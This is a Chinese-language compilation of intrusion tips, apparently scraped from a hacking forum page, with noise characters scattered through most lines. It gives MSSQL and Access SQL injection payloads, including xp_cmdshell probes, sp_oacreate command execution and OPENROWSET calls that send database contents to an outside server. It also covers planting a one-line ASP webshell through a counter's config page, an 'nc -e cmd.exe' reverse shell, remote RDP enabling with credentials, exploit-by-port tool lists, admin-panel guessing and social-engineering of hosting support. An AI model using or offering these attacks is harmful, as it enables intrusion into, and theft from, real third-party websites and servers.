SA点数据库分离技术相关6 m8 r* Q) \$ B3 g! ^: u
& f" S N0 D! [9 b- U/ u3 u% X) ]
# S2 E m) y3 Y- y$ h. z
SA点数据库分离搞法+语句: F. V. u8 V3 v- @# r3 C$ i. z9 l/ K2 I
7 M' y D; f5 Y) C: @注射点不显错,执行下面三条语句页面都返回正常。6 d+ {$ A0 I* U0 d% X; e
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
2 b6 l0 L" K3 T/ l) S9 l0 l# Zand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
( g) `' j' S( g2 f% band 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell'). \5 D! R% t" J: I
可以列目录,判断系统为2000,web与数据库分离
" t3 w% Q# {9 L6 N! ^遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。/ l* e8 ]( u* B; S* _! X! d
在注射点上执行
5 T1 e3 X& ?+ N! W1 b7 wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--" ]% f8 Z* c% V! M
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
2 Q& I7 R0 l+ [6 ^5 ]/ G1 a' j$ K还有我用NC监听得其他端口都没有得到IP。8 m+ [$ Z* \7 d3 d
; }- W; B- P) i; n
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
v3 y) Y! H. I4 J'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
% V+ x: D: x m$ i' C6 F+ G
$ m8 y4 ^& ? x$ V' d5 U;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--7 y7 V) ]! s y- \' A) Z0 c0 L
& R* M# ~ o, p5 Y+ e现在就猜想是不是数据库是内网而且不能连外网。$ W$ K, m }1 b) y" H1 l
. @* W4 R ?0 n& o+ g
8 [, N ]- A0 ]0 `. T9 I6 C5 M4 j) y
access导出txt文本代码* Y0 G! i9 j6 h8 w" P1 S( f
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin v/ V s) n/ D0 v
7 o. j- S# M: c; o; T$ b+ s8 w4 B4 p5 |- W) B+ L- i9 }- t
) @! W( A( c- K* T自动跳转到指定网站代码头% Q# Q- u1 m2 Y
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
) o) y* K4 Q( ^, [' ?; n6 K
/ b, L5 w/ P7 \- j8 E e4 k& C. Q- ^! a7 {* i* _& v
入侵java or jsp站点时默认配置文件路径:* a# k) H$ k1 @+ i5 W7 R
\web-inf\web.xml
# N, `4 L5 T% c, b( _tomcat下的配置文件位置: O; P1 ?: v! {* r1 k
\conf\server.xml (前面加上tomcat路径)/ v& W( j ~6 v: U
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml7 c6 L/ M9 \# W9 l( j$ [
. o% U% @$ P2 L" Z' E
; E: a3 {9 |* @3 `
' s& \$ }- @( U/ O检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:6 a# ]0 }; S) _! v2 N
-1%23
; u/ I7 B7 c: {1 H; ^. n! F- k> 6 r& T3 y' Q( t& t' B( B1 Z4 t
<
6 C: k# L9 `8 U1'+or+'1'='1
) _- L6 D6 F7 ?# Kid=8%bf
$ `# V: m0 T! S/ |! F& s
0 Z/ E5 A7 A( f+ f# s) r& }& a全新注入点检测试法:# O/ ?; O+ C3 E( y6 K0 p1 j) h
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。& {/ v3 ?- _! o0 i* o! O% Z& {' {+ Q1 \
( ^ J$ b1 v2 O+ @在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。1 K) F1 h. t- ]& D# n1 K
7 t* R9 x/ J( y2 r6 i. @搜索型注入判断方法:2 `2 P, `) \3 e
北京%' and '1'='1' and '%'='
' E% ^- _% r3 I' ^北京%' and '1'='2' and '%'='
( I- n$ \. e: `2 t/ l% ~) m. W" |5 q: l5 v! J' z0 d+ ~) Q
* c0 n" Q. a6 Q2 {9 h: C8 C) _1 w! i' {
COOKIES注入:
( Z/ r& ^5 ~ {( C9 O/ \8 V' f
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
. k4 \$ D Q' @0 ^4 \
1 s& ?8 ?/ i7 v/ N! D0 \1 h7 z2000专业版查看本地登录用户命令:" O- _, A! D9 `" V
net config workstation
: ~! d1 `* I. z, A5 o) V/ g6 y: G/ `
" R% ^# _' h# {% v" k2003下查看ipsec配置和默认防火墙配置命令:! D q0 }6 ^, f3 j, L0 f
netsh firewall show config
5 y e7 b& \- Bnetsh ipsec static show all h0 E$ |9 U8 {8 h
7 t# {. }- F) l1 Y$ p# g
不指派指定策略命令:0 V) q2 r2 [. C M
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)( O$ y, i1 q3 e* ]
netsh ipsec static show policy all 显示策略名( }- k4 h) p% Y
, y: j( u3 `* Z% |6 C2 O: o
/ p3 G2 r% ~% u. I, t
猜管理员后台小技巧:
: E# i, `! ?# T5 E3 l: ]admin/left.asp 7 F1 G* P+ {: g2 M1 {7 }! D
admin/main.asp# f- Z+ l1 {, z& Y( |+ e
admin/top.asp
/ |2 ~1 ?3 P2 d7 I2 X+ _! L0 fadmin/admin.asp
9 W& U. G: ^: ^3 x+ M2 a会现出菜单导航,然后迅雷下载全部链接
# d+ N( }' z, I- N# Z) P" i0 n
& f4 h9 Z! E6 l2 E g2 l8 {* R/ `
社会工程学:
* @! L- }% j2 k3 S' }用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
8 {* E% C7 a, ?8 C然后去骗客服( P) }& F3 p3 s, J
) f1 P- c+ F, b7 C' A$ X* _
/ Y7 Q* b' P6 G: g
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: " I9 I! d$ q8 a* b: Q
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
. n/ H$ A4 J8 `% A 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
0 E" m. @, C4 \2 k4 R2 o2 S( C3 F/ S/ V0 o3 x& k
2 j' a! ^3 F6 p" `7 @, ]2 C
7 W9 |7 } N5 f5 K: T$ U
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
- r$ A4 p! U! o4 q: ]
" L6 M- d3 t) |+ ^7 T+ a) h% i: k+ h' ]' b4 Q' D, K/ ?
0 Z2 @" s9 p6 j/ W' L$ I
CMD加密注册表位置
2 f2 `; ^# D; u) Y' U(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor+ V6 C- K% \6 V3 Q3 S- ^
AutoRun# V3 K R, z: g2 b! R$ ]# E
1 U2 B1 q! h) \2 G2 h) c
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
" Z1 j/ @, d( F( {* b1 MAutoRun
: R; ~8 e4 C G% H
j) b1 L/ m, S6 J9 b
/ S% |& i0 A- i- z在找注入时搜索Hidden,把他改成test$ }# C2 n6 S% n
% C# Y% F7 X3 x. b1 R+ G+ q9 ~
" |. ~0 T9 z+ i$ E1 m( d* }- K h9 r
6 o+ V( i/ J/ _% r; S* lmstsc /v:IP /console 3 X0 V7 ]2 `1 Z) v/ N) {7 J
. Q! C4 F* Q) }8 Z H/ }1 X) m7 P B3 g
一句话开3389:: l+ ]2 J8 {0 m
5 ^ Z; z- p: H# @+ |
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
8 c: w! L3 U* Y# N3 r# t% N! n# E) \. j开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.& j6 ?# [% i9 x9 R4 K0 [# d2 ?
' ]+ d. G k& G- q1 F" o/ h
& @9 T& _5 m9 _2 ?- q/ o知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:% q7 C- c5 g- d5 Z* O1 W! U7 d
Insert into admin(user,pwd) values('test','test'). `2 i! Q8 Z+ Y* l+ `& i
+ j' v5 ]1 s; E
4 N2 Y8 R/ q$ N
NC反弹9 z5 h+ W" {- K: f R
先在本机执行: nc -vv -lp 监听的端口 (自己执行)
$ Q3 s* j) @' N0 ?* R8 m1 t然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)7 b0 S2 P; u/ b
$ I$ q& t6 w- z( Z5 i% x! @
% s1 b0 G( D0 f* ` a1 u在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
. K; r! f( I1 j' ]; z4 I& O& N) s3 {. \' l4 U1 n3 f/ b
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
9 N$ k5 T9 }: W! L% i例如:, }1 y1 G) O3 ~% G
subst k: d:\www\ 用d盘www目录替代k盘' c( d" m. e6 _5 A8 _1 n
subst k: /d 解除K盘代替 |